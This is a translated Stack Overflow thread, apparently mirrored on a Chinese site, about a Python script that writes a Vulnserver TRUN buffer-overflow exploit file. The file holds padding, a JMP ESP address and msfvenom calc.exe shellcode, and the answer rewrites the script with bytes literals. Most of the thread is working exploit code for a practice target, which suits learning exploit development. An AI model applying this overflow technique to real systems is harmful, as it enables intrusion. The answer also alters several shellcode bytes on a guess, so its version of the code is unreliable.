[英]Python script generating file with exploit code - unicodeescape unicode error
我正在编写一个脚本,该脚本应生成一个文件以利用Vulnserver 。
一切似乎都很好,但是后来我添加了shellcode,现在遇到了unicode错误(unicodeescape)。
#!C:\Users\user\AppData\Local\Programs\Python\Python36\python.exe
import sys, struct
file_suffix='shellcode.txt'
buf='.'
buf+='A'*2006 # buffer
#buf+=''*4 #EIP
#buf+=struct.pack('<I', 0x625011AF) # JMP ESP at 625011AF in essfunc.dll
buf+='\xaf\x11\x50\x62'
#buf+='C'*2000 # space for shellcode
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += "\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += "\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += "\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += "\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += "\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += "\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += "\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += "\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += "\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += "\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += "\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += "\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\xab"
buf += "\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += "\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += "\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += "\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"
stat_opt='TRUN'
content=stat_opt+' '+buf
f = open(stat_opt+file_suffix,"w")
f.write(content)
f.close()
然后,将生成的文件与ncat
发送到vulnserver。
如何成功写入文件,其中包含上面脚本中定义的字符串(以TRUN .AAAA[...]
开头),然后是值\\xaf\\x11\\x50\\x62
,然后是外壳代码?
编辑完全忘记了回溯:
File "gen.py", line 16
buf+="\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2"
^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 48-50: truncated \xXX escape
edit2我想将字节码写入文件,由十六进制值表示。
edit3我从msfvenom
重新复制了外壳程序代码, msfvenom
单字符十六进制值正确(脚本已更新)。 但是我有一个新的追溯:
Traceback (most recent call last):
File "gen.py", line 38, in <module>
f.write(content)
File "C:\Users\user\AppData\Local\Programs\Python\Python36\lib\encodings\cp1252.py", line 19, in encode
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
UnicodeEncodeError: 'charmap' codec can't encode character '\x83' in position 2038: character maps to <undefined>
每个十六进制代码都需要两位数字,但是第一行的末尾有\\x2
这会造成问题。 我不知道可能一定是\\x02
您还\\xa
在其他行的末尾-也许你需要\\x0a
Python将其视为UNICODE
文本,并尝试使用CP1252
( Code Page 1252
)转换为字节
更好地使用bytes
-将前缀b
添加到所有文本。 并用wb
保存在文件中
buf = b'.'
buf += b'A'*2006 # buffer
buf += b'\xaf\x11\x50\x62' # EIP; JMP ESP at 625011AF in essfunc.dll
#buf+='C'*2000 # space for shellcode
# Generated with: msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += b"\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x02"
buf += b"\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += b"\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += b"\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += b"\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += b"\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += b"\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += b"\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += b"\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += b"\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += b"\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += b"\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += b"\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\x0a"
buf += b"\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += b"\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += b"\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += b"\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"
content = b'TRUN '+buf
f = open('TRUNshellcode_test.txt', "wb")
f.write(content)
f.close()
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.